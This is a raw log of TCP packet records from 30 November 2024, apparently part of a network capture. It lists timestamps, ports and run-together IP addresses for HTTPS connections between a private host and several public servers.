                                                                                                                                                                                                                                                      Nov 30, 2024 22:38:52.960967064 CET4434992623.200.3.11192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:38:52.960992098 CET4434992623.200.3.11192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:38:52.961000919 CET49926443192.168.2.1023.200.3.11
                                                                                                                                                                                                                                                      Nov 30, 2024 22:38:52.961026907 CET49926443192.168.2.1023.200.3.11
                                                                                                                                                                                                                                                      Nov 30, 2024 22:38:52.965372086 CET49926443192.168.2.1023.200.3.11
                                                                                                                                                                                                                                                      Nov 30, 2024 22:38:52.965383053 CET4434992623.200.3.11192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:38:53.003338099 CET4434992094.130.210.71192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:38:53.008521080 CET4434992323.200.3.11192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:38:53.008557081 CET4434992323.200.3.11192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:38:53.008615971 CET49923443192.168.2.1023.200.3.11
                                                                                                                                                                                                                                                      Nov 30, 2024 22:38:53.008620024 CET4434992323.200.3.11192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:38:53.008682966 CET49923443192.168.2.1023.200.3.11
                                                                                                                                                                                                                                                      Nov 30, 2024 22:38:53.017891884 CET49923443192.168.2.1023.200.3.11
                                                                                                                                                                                                                                                      Nov 30, 2024 22:38:53.017921925 CET4434992323.200.3.11192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:38:53.032819986 CET4434992094.130.210.71192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:38:53.032953978 CET49920443192.168.2.1094.130.210.71
                                                                                                                                                                                                                                                      Nov 30, 2024 22:38:53.032963037 CET4434992094.130.210.71192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:38:53.032994032 CET4434992094.130.210.71192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:38:53.033073902 CET49920443192.168.2.1094.130.210.71
                                                                                                                                                                                                                                                      Nov 30, 2024 22:38:53.033101082 CET4434992094.130.210.71192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:38:53.033122063 CET49920443192.168.2.1094.130.210.71
                                                                                                                                                                                                                                                      Nov 30, 2024 22:38:53.033176899 CET49920443192.168.2.1094.130.210.71
                                                                                                                                                                                                                                                      Nov 30, 2024 22:38:53.033255100 CET49920443192.168.2.1094.130.210.71
                                                                                                                                                                                                                                                      Nov 30, 2024 22:38:53.033281088 CET49920443192.168.2.1094.130.210.71
                                                                                                                                                                                                                                                      Nov 30, 2024 22:38:53.034610033 CET4434992094.130.210.71192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:38:53.034631014 CET4434992094.130.210.71192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:38:53.034710884 CET49920443192.168.2.1094.130.210.71
                                                                                                                                                                                                                                                      Nov 30, 2024 22:38:53.034729958 CET4434992094.130.210.71192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:38:53.034759998 CET4434992094.130.210.71192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:38:53.034838915 CET49920443192.168.2.1094.130.210.71
                                                                                                                                                                                                                                                      Nov 30, 2024 22:38:53.034856081 CET4434992094.130.210.71192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:38:53.034873009 CET49920443192.168.2.1094.130.210.71
                                                                                                                                                                                                                                                      Nov 30, 2024 22:38:53.034882069 CET4434992094.130.210.71192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:38:53.034989119 CET49920443192.168.2.1094.130.210.71
                                                                                                                                                                                                                                                      Nov 30, 2024 22:38:53.075335979 CET4434992094.130.210.71192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:38:53.075448990 CET49920443192.168.2.1094.130.210.71
                                                                                                                                                                                                                                                      Nov 30, 2024 22:38:53.107099056 CET4434992718.238.55.70192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:38:53.107187986 CET4434992718.238.55.70192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:38:53.107254982 CET49927443192.168.2.1018.238.55.70
                                                                                                                                                                                                                                                      Nov 30, 2024 22:38:53.111335993 CET49927443192.168.2.1018.238.55.70
                                                                                                                                                                                                                                                      Nov 30, 2024 22:38:53.111362934 CET4434992718.238.55.70192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:38:53.119335890 CET4434992094.130.210.71192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:38:53.146615028 CET4434992094.130.210.71192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:38:53.146728992 CET4434992094.130.210.71192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:38:53.146730900 CET49920443192.168.2.1094.130.210.71
                                                                                                                                                                                                                                                      Nov 30, 2024 22:38:53.146764040 CET4434992094.130.210.71192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:38:53.146778107 CET49920443192.168.2.1094.130.210.71
                                                                                                                                                                                                                                                      Nov 30, 2024 22:38:53.146797895 CET4434992094.130.210.71192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:38:53.146823883 CET49920443192.168.2.1094.130.210.71
                                                                                                                                                                                                                                                      Nov 30, 2024 22:38:53.146835089 CET49920443192.168.2.1094.130.210.71
                                                                                                                                                                                                                                                      Nov 30, 2024 22:38:53.146845102 CET4434992094.130.210.71192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:38:53.146851063 CET49920443192.168.2.1094.130.210.71
                                                                                                                                                                                                                                                      Nov 30, 2024 22:38:53.146897078 CET4434992094.130.210.71192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:38:53.146938086 CET49920443192.168.2.1094.130.210.71
                                                                                                                                                                                                                                                      Nov 30, 2024 22:38:53.146981955 CET49920443192.168.2.1094.130.210.71
                                                                                                                                                                                                                                                      Nov 30, 2024 22:38:53.153534889 CET4434992094.130.210.71192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:38:53.153582096 CET4434992094.130.210.71192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:38:53.153613091 CET49920443192.168.2.1094.130.210.71
                                                                                                                                                                                                                                                      Nov 30, 2024 22:38:53.153685093 CET49920443192.168.2.1094.130.210.71
                                                                                                                                                                                                                                                      Nov 30, 2024 22:38:53.153728962 CET4434992094.130.210.71192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:38:53.153753996 CET4434992094.130.210.71192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:38:53.153878927 CET49920443192.168.2.1094.130.210.71
                                                                                                                                                                                                                                                      Nov 30, 2024 22:38:53.154346943 CET49920443192.168.2.1094.130.210.71
                                                                                                                                                                                                                                                      Nov 30, 2024 22:38:53.155268908 CET4434992094.130.210.71192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:38:53.155344009 CET4434992094.130.210.71192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:38:53.155364037 CET49920443192.168.2.1094.130.210.71
                                                                                                                                                                                                                                                      Nov 30, 2024 22:38:53.155395031 CET49920443192.168.2.1094.130.210.71
                                                                                                                                                                                                                                                      Nov 30, 2024 22:38:53.155405045 CET4434992094.130.210.71192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:38:53.155420065 CET4434992094.130.210.71192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:38:53.155437946 CET49920443192.168.2.1094.130.210.71
                                                                                                                                                                                                                                                      Nov 30, 2024 22:38:53.155459881 CET4434992094.130.210.71192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:38:53.155572891 CET4434992094.130.210.71192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:38:53.155605078 CET49920443192.168.2.1094.130.210.71
                                                                                                                                                                                                                                                      Nov 30, 2024 22:38:53.155746937 CET49920443192.168.2.1094.130.210.71
                                                                                                                                                                                                                                                      Nov 30, 2024 22:38:53.155775070 CET49920443192.168.2.1094.130.210.71
                                                                                                                                                                                                                                                      Nov 30, 2024 22:38:53.155864000 CET49920443192.168.2.1094.130.210.71
                                                                                                                                                                                                                                                      Nov 30, 2024 22:38:53.155879021 CET49920443192.168.2.1094.130.210.71
                                                                                                                                                                                                                                                      Nov 30, 2024 22:38:53.155910969 CET49920443192.168.2.1094.130.210.71
                                                                                                                                                                                                                                                      Nov 30, 2024 22:38:53.156675100 CET4434992094.130.210.71192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:38:53.156764984 CET4434992094.130.210.71192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:38:53.156766891 CET49920443192.168.2.1094.130.210.71
                                                                                                                                                                                                                                                      Nov 30, 2024 22:38:53.156790972 CET4434992094.130.210.71192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:38:53.156830072 CET49920443192.168.2.1094.130.210.71
                                                                                                                                                                                                                                                      Nov 30, 2024 22:38:53.156850100 CET4434992094.130.210.71192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:38:53.156868935 CET49920443192.168.2.1094.130.210.71
                                                                                                                                                                                                                                                      Nov 30, 2024 22:38:53.156889915 CET4434992094.130.210.71192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:38:53.157138109 CET49920443192.168.2.1094.130.210.71
                                                                                                                                                                                                                                                      Nov 30, 2024 22:38:53.157155037 CET4434992094.130.210.71192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:38:53.157166958 CET49920443192.168.2.1094.130.210.71
                                                                                                                                                                                                                                                      Nov 30, 2024 22:38:53.157179117 CET49920443192.168.2.1094.130.210.71
                                                                                                                                                                                                                                                      Nov 30, 2024 22:38:53.157233953 CET49920443192.168.2.1094.130.210.71
                                                                                                                                                                                                                                                      Nov 30, 2024 22:38:53.157263041 CET49920443192.168.2.1094.130.210.71
                                                                                                                                                                                                                                                      Nov 30, 2024 22:38:53.157269001 CET49920443192.168.2.1094.130.210.71
                                                                                                                                                                                                                                                      Nov 30, 2024 22:38:53.157285929 CET49920443192.168.2.1094.130.210.71
                                                                                                                                                                                                                                                      Nov 30, 2024 22:38:53.157320023 CET49920443192.168.2.1094.130.210.71
                                                                                                                                                                                                                                                      Nov 30, 2024 22:38:53.173150063 CET4434992813.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:38:53.173907995 CET49928443192.168.2.1013.107.246.63
                                                                                                                                                                                                                                                      Nov 30, 2024 22:38:53.173940897 CET4434992813.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:38:53.174462080 CET49928443192.168.2.1013.107.246.63
                                                                                                                                                                                                                                                      Nov 30, 2024 22:38:53.174468040 CET4434992813.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:38:53.199337959 CET4434992094.130.210.71192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:38:53.243295908 CET4434992094.130.210.71192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:38:53.243482113 CET49920443192.168.2.1094.130.210.71
                                                                                                                                                                                                                                                      Nov 30, 2024 22:38:53.267993927 CET4434992094.130.210.71192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:38:53.268143892 CET49920443192.168.2.1094.130.210.71
                                                                                                                                                                                                                                                      Nov 30, 2024 22:38:53.268182993 CET4434992094.130.210.71192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:38:53.268203020 CET49920443192.168.2.1094.130.210.71
                                                                                                                                                                                                                                                      Nov 30, 2024 22:38:53.268228054 CET4434992094.130.210.71192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:38:53.268445969 CET49920443192.168.2.1094.130.210.71
                                                                                                                                                                                                                                                      Nov 30, 2024 22:38:53.268585920 CET49920443192.168.2.1094.130.210.71
                                                                                                                                                                                                                                                      Nov 30, 2024 22:38:53.268618107 CET49920443192.168.2.1094.130.210.71
                                                                                                                                                                                                                                                      Nov 30, 2024 22:38:53.268639088 CET49920443192.168.2.1094.130.210.71
                                                                                                                                                                                                                                                      Nov 30, 2024 22:38:53.268662930 CET49920443192.168.2.1094.130.210.71
                                                                                                                                                                                                                                                      Nov 30, 2024 22:38:53.268668890 CET49920443192.168.2.1094.130.210.71
                                                                                                                                                                                                                                                      Nov 30, 2024 22:38:53.268687010 CET49920443192.168.2.1094.130.210.71
                                                                                                                                                                                                                                                      Nov 30, 2024 22:38:53.268732071 CET49920443192.168.2.1094.130.210.71
                                                                                                                                                                                                                                                      Nov 30, 2024 22:38:53.268749952 CET49920443192.168.2.1094.130.210.71
                                                                                                                                                                                                                                                      Nov 30, 2024 22:38:53.273569107 CET4434992094.130.210.71192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:38:53.273586988 CET4434992094.130.210.71192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:38:53.273700953 CET49920443192.168.2.1094.130.210.71
                                                                                                                                                                                                                                                      Nov 30, 2024 22:38:53.273722887 CET4434992094.130.210.71192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:38:53.274053097 CET49920443192.168.2.1094.130.210.71
                                                                                                                                                                                                                                                      Nov 30, 2024 22:38:53.274075031 CET4434992094.130.210.71192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:38:53.274091959 CET49920443192.168.2.1094.130.210.71
                                                                                                                                                                                                                                                      Nov 30, 2024 22:38:53.274121046 CET49920443192.168.2.1094.130.210.71
                                                                                                                                                                                                                                                      Nov 30, 2024 22:38:53.274168015 CET49920443192.168.2.1094.130.210.71
                                                                                                                                                                                                                                                      Nov 30, 2024 22:38:53.274190903 CET49920443192.168.2.1094.130.210.71
                                                                                                                                                                                                                                                      Nov 30, 2024 22:38:53.274215937 CET49920443192.168.2.1094.130.210.71
                                                                                                                                                                                                                                                      Nov 30, 2024 22:38:53.274255037 CET49920443192.168.2.1094.130.210.71
                                                                                                                                                                                                                                                      Nov 30, 2024 22:38:53.274264097 CET49920443192.168.2.1094.130.210.71
                                                                                                                                                                                                                                                      Nov 30, 2024 22:38:53.274279118 CET49920443192.168.2.1094.130.210.71
                                                                                                                                                                                                                                                      Nov 30, 2024 22:38:53.274450064 CET49920443192.168.2.1094.130.210.71
                                                                                                                                                                                                                                                      Nov 30, 2024 22:38:53.276185036 CET4434992094.130.210.71192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:38:53.276285887 CET49920443192.168.2.1094.130.210.71
                                                                                                                                                                                                                                                      Nov 30, 2024 22:38:53.276309013 CET4434992094.130.210.71192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:38:53.276341915 CET4434992094.130.210.71192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:38:53.276375055 CET49920443192.168.2.1094.130.210.71
                                                                                                                                                                                                                                                      Nov 30, 2024 22:38:53.276392937 CET4434992094.130.210.71192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:38:53.276438951 CET49920443192.168.2.1094.130.210.71
                                                                                                                                                                                                                                                      Nov 30, 2024 22:38:53.276463985 CET49920443192.168.2.1094.130.210.71
                                                                                                                                                                                                                                                      Nov 30, 2024 22:38:53.276464939 CET4434992094.130.210.71192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:38:53.276484013 CET4434992094.130.210.71192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:38:53.276570082 CET49920443192.168.2.1094.130.210.71
                                                                                                                                                                                                                                                      Nov 30, 2024 22:38:53.276595116 CET49920443192.168.2.1094.130.210.71
                                                                                                                                                                                                                                                      Nov 30, 2024 22:38:53.276695967 CET49920443192.168.2.1094.130.210.71
                                                                                                                                                                                                                                                      Nov 30, 2024 22:38:53.276738882 CET49920443192.168.2.1094.130.210.71
                                                                                                                                                                                                                                                      Nov 30, 2024 22:38:53.276768923 CET49920443192.168.2.1094.130.210.71
                                                                                                                                                                                                                                                      Nov 30, 2024 22:38:53.276799917 CET49920443192.168.2.1094.130.210.71
                                                                                                                                                                                                                                                      Nov 30, 2024 22:38:53.278166056 CET4434992094.130.210.71192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:38:53.278218985 CET4434992094.130.210.71192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:38:53.278352976 CET49920443192.168.2.1094.130.210.71
                                                                                                                                                                                                                                                      Nov 30, 2024 22:38:53.278363943 CET4434992094.130.210.71192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:38:53.278389931 CET4434992094.130.210.71192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:38:53.278460979 CET49920443192.168.2.1094.130.210.71
                                                                                                                                                                                                                                                      Nov 30, 2024 22:38:53.278582096 CET49920443192.168.2.1094.130.210.71
                                                                                                                                                                                                                                                      Nov 30, 2024 22:38:53.278628111 CET49920443192.168.2.1094.130.210.71
                                                                                                                                                                                                                                                      Nov 30, 2024 22:38:53.278645039 CET49920443192.168.2.1094.130.210.71
                                                                                                                                                                                                                                                      Nov 30, 2024 22:38:53.280080080 CET4434992094.130.210.71192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:38:53.280123949 CET4434992094.130.210.71192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:38:53.280273914 CET49920443192.168.2.1094.130.210.71
                                                                                                                                                                                                                                                      Nov 30, 2024 22:38:53.280307055 CET4434992094.130.210.71192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:38:53.280323982 CET49920443192.168.2.1094.130.210.71
                                                                                                                                                                                                                                                      Nov 30, 2024 22:38:53.280323982 CET49920443192.168.2.1094.130.210.71
                                                                                                                                                                                                                                                      Nov 30, 2024 22:38:53.280334949 CET4434992094.130.210.71192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:38:53.280417919 CET49920443192.168.2.1094.130.210.71
                                                                                                                                                                                                                                                      Nov 30, 2024 22:38:53.280448914 CET49920443192.168.2.1094.130.210.71
                                                                                                                                                                                                                                                      Nov 30, 2024 22:38:53.280488968 CET49920443192.168.2.1094.130.210.71
                                                                                                                                                                                                                                                      Nov 30, 2024 22:38:53.280494928 CET49920443192.168.2.1094.130.210.71
                                                                                                                                                                                                                                                      Nov 30, 2024 22:38:53.280884027 CET49920443192.168.2.1094.130.210.71
                                                                                                                                                                                                                                                      Nov 30, 2024 22:38:53.281542063 CET4434992094.130.210.71192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:38:53.281605005 CET4434992094.130.210.71192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:38:53.281637907 CET49920443192.168.2.1094.130.210.71
                                                                                                                                                                                                                                                      Nov 30, 2024 22:38:53.281675100 CET49920443192.168.2.1094.130.210.71
                                                                                                                                                                                                                                                      Nov 30, 2024 22:38:53.281697989 CET4434992094.130.210.71192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:38:53.281877041 CET49920443192.168.2.1094.130.210.71
                                                                                                                                                                                                                                                      Nov 30, 2024 22:38:53.281898022 CET4434992094.130.210.71192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:38:53.281968117 CET49920443192.168.2.1094.130.210.71
                                                                                                                                                                                                                                                      Nov 30, 2024 22:38:53.281984091 CET49920443192.168.2.1094.130.210.71
                                                                                                                                                                                                                                                      Nov 30, 2024 22:38:53.282067060 CET49920443192.168.2.1094.130.210.71
                                                                                                                                                                                                                                                      Nov 30, 2024 22:38:53.282108068 CET49920443192.168.2.1094.130.210.71
                                                                                                                                                                                                                                                      Nov 30, 2024 22:38:53.282145977 CET49920443192.168.2.1094.130.210.71
                                                                                                                                                                                                                                                      Nov 30, 2024 22:38:53.282171965 CET49920443192.168.2.1094.130.210.71
                                                                                                                                                                                                                                                      Nov 30, 2024 22:38:53.282799006 CET4434992094.130.210.71192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:38:53.282815933 CET4434992094.130.210.71192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:38:53.282922029 CET49920443192.168.2.1094.130.210.71
                                                                                                                                                                                                                                                      Nov 30, 2024 22:38:53.282926083 CET4434992094.130.210.71192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:38:53.282953024 CET4434992094.130.210.71192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:38:53.283071041 CET49920443192.168.2.1094.130.210.71
                                                                                                                                                                                                                                                      Nov 30, 2024 22:38:53.283112049 CET4434992094.130.210.71192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:38:53.283123016 CET49920443192.168.2.1094.130.210.71
                                                                                                                                                                                                                                                      Nov 30, 2024 22:38:53.283296108 CET49920443192.168.2.1094.130.210.71
                                                                                                                                                                                                                                                      Nov 30, 2024 22:38:53.283332109 CET49920443192.168.2.1094.130.210.71
                                                                                                                                                                                                                                                      Nov 30, 2024 22:38:53.283894062 CET4434992094.130.210.71192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:38:53.283910036 CET4434992094.130.210.71192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:38:53.284023046 CET4434992094.130.210.71192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:38:53.284182072 CET49920443192.168.2.1094.130.210.71
                                                                                                                                                                                                                                                      Nov 30, 2024 22:38:53.284212112 CET4434992094.130.210.71192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:38:53.284226894 CET49920443192.168.2.1094.130.210.71
                                                                                                                                                                                                                                                      Nov 30, 2024 22:38:53.284358025 CET49920443192.168.2.1094.130.210.71
                                                                                                                                                                                                                                                      Nov 30, 2024 22:38:53.284392118 CET49920443192.168.2.1094.130.210.71
                                                                                                                                                                                                                                                      Nov 30, 2024 22:38:53.313375950 CET4434993120.110.205.119192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:38:53.314089060 CET49931443192.168.2.1020.110.205.119
                                                                                                                                                                                                                                                      Nov 30, 2024 22:38:53.314112902 CET4434993120.110.205.119192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:38:53.314512014 CET4434993120.110.205.119192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:38:53.314877987 CET49931443192.168.2.1020.110.205.119
                                                                                                                                                                                                                                                      Nov 30, 2024 22:38:53.314949989 CET4434993120.110.205.119192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:38:53.315180063 CET49931443192.168.2.1020.110.205.119
                                                                                                                                                                                                                                                      Nov 30, 2024 22:38:53.315500975 CET4434992094.130.210.71192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:38:53.315613985 CET4434992094.130.210.71192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:38:53.315778971 CET49920443192.168.2.1094.130.210.71
                                                                                                                                                                                                                                                      Nov 30, 2024 22:38:53.315808058 CET4434992094.130.210.71192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:38:53.315818071 CET49920443192.168.2.1094.130.210.71
                                                                                                                                                                                                                                                      Nov 30, 2024 22:38:53.315855026 CET49920443192.168.2.1094.130.210.71
                                                                                                                                                                                                                                                      Nov 30, 2024 22:38:53.315924883 CET49920443192.168.2.1094.130.210.71
                                                                                                                                                                                                                                                      Nov 30, 2024 22:38:53.315968990 CET49920443192.168.2.1094.130.210.71
                                                                                                                                                                                                                                                      Nov 30, 2024 22:38:53.315988064 CET49920443192.168.2.1094.130.210.71
                                                                                                                                                                                                                                                      Nov 30, 2024 22:38:53.359333038 CET4434993120.110.205.119192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:38:53.359738111 CET4434992113.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:38:53.362777948 CET4434992113.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:38:53.362847090 CET49921443192.168.2.1013.107.246.63
                                                                                                                                                                                                                                                      Nov 30, 2024 22:38:53.362963915 CET49921443192.168.2.1013.107.246.63
                                                                                                                                                                                                                                                      Nov 30, 2024 22:38:53.362982988 CET4434992113.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:38:53.363008022 CET49921443192.168.2.1013.107.246.63
                                                                                                                                                                                                                                                      Nov 30, 2024 22:38:53.363013983 CET4434992113.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:38:53.363332987 CET4434992094.130.210.71192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:38:53.363531113 CET49920443192.168.2.1094.130.210.71
                                                                                                                                                                                                                                                      Nov 30, 2024 22:38:53.363684893 CET49920443192.168.2.1094.130.210.71
                                                                                                                                                                                                                                                      Nov 30, 2024 22:38:53.367178917 CET49941443192.168.2.1013.107.246.63
                                                                                                                                                                                                                                                      Nov 30, 2024 22:38:53.367229939 CET4434994113.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:38:53.367413044 CET49941443192.168.2.1013.107.246.63
                                                                                                                                                                                                                                                      Nov 30, 2024 22:38:53.367616892 CET49941443192.168.2.1013.107.246.63
                                                                                                                                                                                                                                                      Nov 30, 2024 22:38:53.367640018 CET4434994113.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:38:53.376665115 CET4434992913.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:38:53.377599955 CET49929443192.168.2.1013.107.246.63
                                                                                                                                                                                                                                                      Nov 30, 2024 22:38:53.377633095 CET4434992913.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:38:53.378545046 CET49929443192.168.2.1013.107.246.63
                                                                                                                                                                                                                                                      Nov 30, 2024 22:38:53.378551960 CET4434992913.107.246.63192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:38:53.387132883 CET4434992094.130.210.71192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:38:53.387250900 CET4434992094.130.210.71192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:38:53.387456894 CET4434992094.130.210.71192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:38:53.387625933 CET49920443192.168.2.1094.130.210.71
                                                                                                                                                                                                                                                      Nov 30, 2024 22:38:53.387665033 CET49920443192.168.2.1094.130.210.71
                                                                                                                                                                                                                                                      Nov 30, 2024 22:38:53.387682915 CET49920443192.168.2.1094.130.210.71
                                                                                                                                                                                                                                                      Nov 30, 2024 22:38:53.388876915 CET4434992094.130.210.71192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:38:53.388977051 CET49920443192.168.2.1094.130.210.71
                                                                                                                                                                                                                                                      Nov 30, 2024 22:38:53.388999939 CET4434992094.130.210.71192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:38:53.389084101 CET49920443192.168.2.1094.130.210.71
                                                                                                                                                                                                                                                      Nov 30, 2024 22:38:53.389084101 CET49920443192.168.2.1094.130.210.71
                                                                                                                                                                                                                                                      Nov 30, 2024 22:38:53.389105082 CET4434992094.130.210.71192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:38:53.389134884 CET4434992094.130.210.71192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:38:53.389343977 CET49920443192.168.2.1094.130.210.71
                                                                                                                                                                                                                                                      Nov 30, 2024 22:38:53.389611006 CET49920443192.168.2.1094.130.210.71
                                                                                                                                                                                                                                                      Nov 30, 2024 22:38:53.389705896 CET49920443192.168.2.1094.130.210.71
                                                                                                                                                                                                                                                      Nov 30, 2024 22:38:53.389717102 CET49920443192.168.2.1094.130.210.71
                                                                                                                                                                                                                                                      Nov 30, 2024 22:38:53.389731884 CET49920443192.168.2.1094.130.210.71
                                                                                                                                                                                                                                                      Nov 30, 2024 22:38:53.389755011 CET49920443192.168.2.1094.130.210.71
                                                                                                                                                                                                                                                      Nov 30, 2024 22:38:53.389796972 CET49920443192.168.2.1094.130.210.71
                                                                                                                                                                                                                                                      Nov 30, 2024 22:38:53.392841101 CET44349936104.70.121.147192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:38:53.393136978 CET49936443192.168.2.10104.70.121.147
                                                                                                                                                                                                                                                      Nov 30, 2024 22:38:53.393151999 CET44349936104.70.121.147192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:38:53.393244982 CET4434992094.130.210.71192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:38:53.393404961 CET4434992094.130.210.71192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:38:53.393529892 CET49920443192.168.2.1094.130.210.71
                                                                                                                                                                                                                                                      Nov 30, 2024 22:38:53.393554926 CET49920443192.168.2.1094.130.210.71
                                                                                                                                                                                                                                                      Nov 30, 2024 22:38:53.393575907 CET4434992094.130.210.71192.168.2.10
                                                                                                                                                                                                                                                      Nov 30, 2024 22:38:53.393809080 CET49920443192.168.2.1094.130.210.71
                                                                                                                                                                                                                                                      Nov 30, 2024 22:38:53.393837929 CET49920443192.168.2.1094.130.210.71
